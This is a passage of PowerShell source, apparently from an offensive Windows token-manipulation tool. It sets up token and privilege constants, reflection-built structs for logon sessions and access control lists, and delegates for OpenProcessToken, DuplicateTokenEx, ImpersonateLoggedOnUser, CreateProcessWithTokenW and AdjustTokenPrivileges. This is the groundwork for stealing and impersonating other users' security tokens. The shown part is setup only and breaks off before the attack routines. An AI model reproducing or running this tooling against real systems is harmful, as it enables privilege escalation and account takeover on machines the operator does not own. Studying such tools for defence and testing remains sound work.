SECURITY_DELEGATION = 3\n        DACL_SECURITY_INFORMATION = 0x4\n        ACCESS_ALLOWED_ACE_TYPE = 0x0\n        STANDARD_RIGHTS_REQUIRED = 0x000F0000\n        DESKTOP_GENERIC_ALL = 0x000F01FF\n        WRITE_DAC = 0x00040000\n        OBJECT_INHERIT_ACE = 0x1\n        GRANT_ACCESS = 0x1\n        TRUSTEE_IS_NAME = 0x1\n        TRUSTEE_IS_SID = 0x0\n        TRUSTEE_IS_USER = 0x1\n        TRUSTEE_IS_WELL_KNOWN_GROUP = 0x5\n        TRUSTEE_IS_GROUP = 0x2\n        PROCESS_QUERY_INFORMATION = 0x400\n        TOKEN_ASSIGN_PRIMARY = 0x1\n        TOKEN_DUPLICATE = 0x2\n        TOKEN_IMPERSONATE = 0x4\n        TOKEN_QUERY_SOURCE = 0x10\n        STANDARD_RIGHTS_READ = 0x20000\n        TokenStatistics = 10\n        TOKEN_ALL_ACCESS = 0xf01ff\n        MAXIMUM_ALLOWED = 0x02000000\n        THREAD_ALL_ACCESS = 0x1f03ff\n        ERROR_INVALID_PARAMETER = 0x57\n        LOGON_NETCREDENTIALS_ONLY = 0x2\n        SE_PRIVILEGE_ENABLED = 0x2\n        SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1\n        SE_PRIVILEGE_REMOVED = 0x4\n    }\n\n    $Win32Constants = New-Object PSObject -Property $Constants\n    ###############################\n\n\n    ###############################\n    #Win32Structures\n    ###############################\n\t#Define all the structures/enums that will be used\n\t#\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t$Domain = [AppDomain]::CurrentDomain\n\t$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n    #ENUMs\n\t$TypeBuilder = $ModuleBuilder.DefineEnum('TOKEN_INFORMATION_CLASS', 'Public', [UInt32])\n\t$TypeBuilder.DefineLiteral('TokenUser', [UInt32] 1) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenGroups', [UInt32] 2) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenPrivileges', [UInt32] 3) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenOwner', [UInt32] 4) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenPrimaryGroup', [UInt32] 5) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDefaultDacl', [UInt32] 6) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSource', [UInt32] 7) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenType', [UInt32] 8) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenImpersonationLevel', [UInt32] 9) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenStatistics', [UInt32] 10) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedSids', [UInt32] 11) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSessionId', [UInt32] 12) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenGroupsAndPrivileges', [UInt32] 13) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSessionReference', [UInt32] 14) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSandBoxInert', [UInt32] 15) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAuditPolicy', [UInt32] 16) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenOrigin', [UInt32] 17) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenElevationType', [UInt32] 18) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenLinkedToken', [UInt32] 19) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenElevation', [UInt32] 20) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenHasRestrictions', [UInt32] 21) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAccessInformation', [UInt32] 22) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenVirtualizationAllowed', [UInt32] 23) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenVirtualizationEnabled', [UInt32] 24) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIntegrityLevel', [UInt32] 25) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenUIAccess', [UInt32] 26) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenMandatoryPolicy', [UInt32] 27) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenLogonSid', [UInt32] 28) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIsAppContainer', [UInt32] 29) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenCapabilities', [UInt32] 30) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAppContainerSid', [UInt32] 31) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAppContainerNumber', [UInt32] 32) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenUserClaimAttributes', [UInt32] 33) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDeviceClaimAttributes', [UInt32] 34) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedUserClaimAttributes', [UInt32] 35) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedDeviceClaimAttributes', [UInt32] 36) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDeviceGroups', [UInt32] 37) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedDeviceGroups', [UInt32] 38) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSecurityAttributes', [UInt32] 39) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIsRestricted', [UInt32] 40) | Out-Null\n    $TypeBuilder.DefineLiteral('MaxTokenInfoClass', [UInt32] 41) | Out-Null\n\t$TOKEN_INFORMATION_CLASS = $TypeBuilder.CreateType()\n\n    #STRUCTs\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LARGE_INTEGER', $Attributes, [System.ValueType], 8)\n\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n\t$LARGE_INTEGER = $TypeBuilder.CreateType()\n\n    #Struct LUID\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('HighPart', [Int32], 'Public') | Out-Null\n\t$LUID = $TypeBuilder.CreateType()\n\n    #Struct TOKEN_STATISTICS\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_STATISTICS', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('TokenId', $LUID, 'Public') | Out-Null\n\t$TypeBuilder.DefineField('AuthenticationId', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('ExpirationTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('TokenType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ImpersonationLevel', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('DynamicCharged', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('DynamicAvailable', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('GroupCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ModifiedId', $LUID, 'Public') | Out-Null\n\t$TOKEN_STATISTICS = $TypeBuilder.CreateType()\n\n    #Struct LSA_UNICODE_STRING\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LSA_UNICODE_STRING', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('Length', [UInt16], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('MaximumLength', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Buffer', [IntPtr], 'Public') | Out-Null\n\t$LSA_UNICODE_STRING = $TypeBuilder.CreateType()\n\n    #Struct LSA_LAST_INTER_LOGON_INFO\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LSA_LAST_INTER_LOGON_INFO', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('LastSuccessfulLogon', $LARGE_INTEGER, 'Public') | Out-Null\n\t$TypeBuilder.DefineField('LastFailedLogon', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('FailedAttemptCountSinceLastSuccessfulLogon', [UInt32], 'Public') | Out-Null\n\t$LSA_LAST_INTER_LOGON_INFO = $TypeBuilder.CreateType()\n\n    #Struct SECURITY_LOGON_SESSION_DATA\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('SECURITY_LOGON_SESSION_DATA', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('Size', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('LoginID', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Username', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginDomain', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('AuthenticationPackage', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogonType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Session', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sid', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginServer', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('DnsDomainName', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Upn', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('UserFlags', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('LastLogonInfo', $LSA_LAST_INTER_LOGON_INFO, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogonScript', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('ProfilePath', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('HomeDirectory', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('HomeDirectoryDrive', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogoffTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('KickOffTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordLastSet', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordCanChange', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordMustChange', $LARGE_INTEGER, 'Public') | Out-Null\n\t$SECURITY_LOGON_SESSION_DATA = $TypeBuilder.CreateType()\n\n    #Struct STARTUPINFO\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('STARTUPINFO', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('cb', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('lpReserved', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpDesktop', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpTitle', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwX', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwY', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFillAttribute', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('wShowWindow', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('cbReserved2', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpReserved2', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdInput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdOutput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdError', [IntPtr], 'Public') | Out-Null\n\t$STARTUPINFO = $TypeBuilder.CreateType()\n\n    #Struct PROCESS_INFORMATION\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('PROCESS_INFORMATION', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('hProcess', [IntPtr], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('hThread', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwProcessId', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwThreadId', [UInt32], 'Public') | Out-Null\n\t$PROCESS_INFORMATION = $TypeBuilder.CreateType()\n\n    #Struct TOKEN_ELEVATION\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_ELEVATION', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('TokenIsElevated', [UInt32], 'Public') | Out-Null\n\t$TOKEN_ELEVATION = $TypeBuilder.CreateType()\n\n    #Struct LUID_AND_ATTRIBUTES\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n    $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n    $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n\t\t\n    #Struct TOKEN_PRIVILEGES\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n    $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n    $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n\n    #Struct ACE_HEADER\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACE_HEADER', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('AceType', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceFlags', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceSize', [UInt16], 'Public') | Out-Null\n    $ACE_HEADER = $TypeBuilder.CreateType()\n\n    #Struct ACL\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACL', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('AclRevision', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sbz1', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AclSize', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceCount', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sbz2', [UInt16], 'Public') | Out-Null\n    $ACL = $TypeBuilder.CreateType()\n\n    #Struct ACE_HEADER\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACCESS_ALLOWED_ACE', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('Header', $ACE_HEADER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Mask', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('SidStart', [UInt32], 'Public') | Out-Null\n    $ACCESS_ALLOWED_ACE = $TypeBuilder.CreateType()\n\n    #Struct TRUSTEE\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('TRUSTEE', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('pMultipleTrustee', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('MultipleTrusteeOperation', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('TrusteeForm', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('TrusteeType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ptstrName', [IntPtr], 'Public') | Out-Null\n    $TRUSTEE = $TypeBuilder.CreateType()\n\n    #Struct EXPLICIT_ACCESS\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('EXPLICIT_ACCESS', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('grfAccessPermissions', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('grfAccessMode', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('grfInheritance', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Trustee', $TRUSTEE, 'Public') | Out-Null\n    $EXPLICIT_ACCESS = $TypeBuilder.CreateType()\n    ###############################\n\n\n    ###############################\n    #Win32Functions\n    ###############################\n    $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t$OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\n    $OpenProcessTokenAddr = Get-ProcAddress advapi32.dll OpenProcessToken\n\t$OpenProcessTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$OpenProcessToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessTokenAddr, $OpenProcessTokenDelegate)    \n\n    $GetTokenInformationAddr = Get-ProcAddress advapi32.dll GetTokenInformation\n\t$GetTokenInformationDelegate = Get-DelegateType @([IntPtr], $TOKEN_INFORMATION_CLASS, [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n\t$GetTokenInformation = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetTokenInformationAddr, $GetTokenInformationDelegate)    \n\n    $SetThreadTokenAddr = Get-ProcAddress advapi32.dll SetThreadToken\n\t$SetThreadTokenDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Bool])\n\t$SetThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetThreadTokenAddr, $SetThreadTokenDelegate)    \n\n    $ImpersonateLoggedOnUserAddr = Get-ProcAddress advapi32.dll ImpersonateLoggedOnUser\n\t$ImpersonateLoggedOnUserDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t$ImpersonateLoggedOnUser = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateLoggedOnUserAddr, $ImpersonateLoggedOnUserDelegate)\n\n    $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf\n\t$RevertToSelfDelegate = Get-DelegateType @() ([Bool])\n\t$RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate)\n\n    $LsaGetLogonSessionDataAddr = Get-ProcAddress secur32.dll LsaGetLogonSessionData\n\t$LsaGetLogonSessionDataDelegate = Get-DelegateType @([IntPtr], [IntPtr].MakeByRefType()) ([UInt32])\n\t$LsaGetLogonSessionData = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaGetLogonSessionDataAddr, $LsaGetLogonSessionDataDelegate)\n\n    $CreateProcessWithTokenWAddr = Get-ProcAddress advapi32.dll CreateProcessWithTokenW\n\t$CreateProcessWithTokenWDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool])\n\t$CreateProcessWithTokenW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessWithTokenWAddr, $CreateProcessWithTokenWDelegate)\n\n    $memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\n    $DuplicateTokenExAddr = Get-ProcAddress advapi32.dll DuplicateTokenEx\n\t$DuplicateTokenExDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$DuplicateTokenEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuplicateTokenExAddr, $DuplicateTokenExDelegate)\n\n    $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW\n\t$LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool])\n\t$LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate)\n\n    $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle\n\t$CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t$CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)\n\n    $LsaFreeReturnBufferAddr = Get-ProcAddress secur32.dll LsaFreeReturnBuffer\n\t$LsaFreeReturnBufferDelegate = Get-DelegateType @([IntPtr]) ([UInt32])\n\t$LsaFreeReturnBuffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaFreeReturnBufferAddr, $LsaFreeReturnBufferDelegate)\n\n    $OpenThreadAddr = Get-ProcAddress kernel32.dll OpenThread\n\t$OpenThreadDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t$OpenThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadAddr, $OpenThreadDelegate)\n\n    $OpenThreadTokenAddr = Get-ProcAddress advapi32.dll OpenThreadToken\n\t$OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n\t$OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n\n    $CreateProcessAsUserWAddr = Get-ProcAddress advapi32.dll CreateProcessAsUserW\n\t$CreateProcessAsUserWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool])\n\t$CreateProcessAsUserW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessAsUserWAddr, $CreateProcessAsUserWDelegate)\n\n    $OpenWindowStationWAddr = Get-ProcAddress user32.dll OpenWindowStationW\n    $OpenWindowStationWDelegate = Get-DelegateType @([IntPtr], [Bool], [UInt32]) ([IntPtr])\n    $OpenWindowStationW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenWindowStationWAddr, $OpenWindowStationWDelegate)\n\n    $OpenDesktopAAddr = Get-ProcAddress user32.dll OpenDesktopA\n    $OpenDesktopADelegate = Get-DelegateType @([String], [UInt32], [Bool], [UInt32]) ([IntPtr])\n    $OpenDesktopA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenDesktopAAddr, $OpenDesktopADelegate)\n\n    $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n    $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n    $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n\n    $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n    $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], $LUID.MakeByRefType()) ([Bool])\n    $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n\n    $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n    $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], $TOKEN_PRIVILEGES.MakeByRefType(), [UInt32], [IntPtr], [IntPtr]) ([Bool])\n    $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n\n    $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n    $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n    $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n\n    $GetSecurityInfoAddr = Get-ProcAddress advapi32.dll GetSecurityInfo\n    $GetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType()) ([UInt32])\n    $GetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetSecurityInfoAddr, $GetSecurityInfoDelegate)\n\n    $SetSecurityInfoAddr = Get-ProcAddress advapi32.dll SetSecurityInfo\n    $SetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32])\n    $SetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetSecurityInfoAddr, $SetSecurityInfoDelegate)\n\n    $GetAceAddr = Get-ProcAddress advapi32.dll GetAce\n    $GetAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([IntPtr])\n    $GetAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAceAddr, $GetAceDelegate)\n\n    $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW\n    $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool])\n    $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate)\n\n    $AddAccessAllowedAceAddr = Get-ProcAddress advapi32.dll AddAccessAllowedAce\n    $AddAccessAllowedAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr]) ([Bool])\n    $AddAccessAllowedAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AddAccessAllowedAceAddr, $AddAccessAllowedAceDelegate)\n\n    $CreateWellKnownSidAddr = Get-ProcAddress advapi32.dll CreateWellKnownSid\n    $CreateWellKnownSidDelegate = Get-DelegateType @([UInt32], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool])\n    $CreateWellKnownSid = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateWellKnownSidAddr, $CreateWellKnownSidDelegate)\n\n    $SetEntriesInAclWAddr = Get-ProcAddress advapi32.dll SetEntriesInAclW\n    $SetEntriesInAclWDelegate = Get-DelegateType @([UInt32], $EXPLICIT_ACCESS.MakeByRefType(), [IntPtr], [IntPtr].MakeByRefType()) ([UInt32])\n    $SetEntriesInAclW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetEntriesInAclWAddr, $SetEntriesInAclWDelegate)\n\n    